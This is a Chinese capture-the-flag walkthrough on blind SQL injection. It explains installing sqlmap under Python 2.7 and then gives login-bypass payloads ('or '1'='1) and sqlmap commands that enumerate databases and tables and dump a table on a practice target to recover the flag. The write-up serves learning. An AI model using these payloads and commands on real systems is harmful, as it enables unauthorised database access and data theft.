本题有助于学习和了解盲注原理。俗话说“工欲利其事必先利其器”,练习前一定要安装好sqlmap。没有利器就无法完成注入。
第一步介绍一下如何安装sqlmap。sqlmap安装前需要安装python2.7。我原来用的是python3.8,安装sqlmap后不能运行,要求必须在python.27版本的支持。因此在安装sqlmap前一定在确保已经安装python2.7。
1、确定位置。将sqlmap解压后,复制到python2.7目录下。python.27的安装目录一般是c:\python2.7。
2、建立快捷方式。在桌面点击右键,新建“快捷方式”,在键入对象位置下方的框内输入“cmd”,然后点击下一步,输入快捷方式的名称“sqlmap",点击完成。
3、设置属性。找到刚才建立的快捷方式,右键选择属性,在起始位置处输入“C:\Python27\sqlmap”,确定退出。
4、验证结果。双击快捷方式,进入cmd窗口,输入命令:sqlmap.py -h,如果出现下方的画面,表示安装成功。
第二步,开始注入练习
1、打开浏览器,在用户名处任意输入,在密码处输入:'or '1'='1,提交后显示登录成功。然后将密码改为:'or '1'='2,提交后显示密码错误。判断此处存在sql盲注。
2、打开sqlmap工具,输入“sqlmap.py -u "http://IP地址:60002/" --data="user=admin&pass=123" --dbs”,这条命令是用指定的post参数注入出所有的数据库。运行之后,出现以下画面,通过注入得到共有个数据库及名称。
3、输入“sqlmap.py -u "http://IP地址:60002/" --data="user=admin&pass=123" -D user --tables”,这条命令是用指定的post参数注入出user数据库中的表。
4、得到user数据库中表,然后通过命令:sqlmap.py -u "http://IP地址:60002/" --data="user=admin&pass=123" --dump -T flll4g,可以将表中的记录进行显示。从而得到flag。
我也试了一下,如果通过刚才任意输入的用户名也可以进行注入,速度更快。
网友评论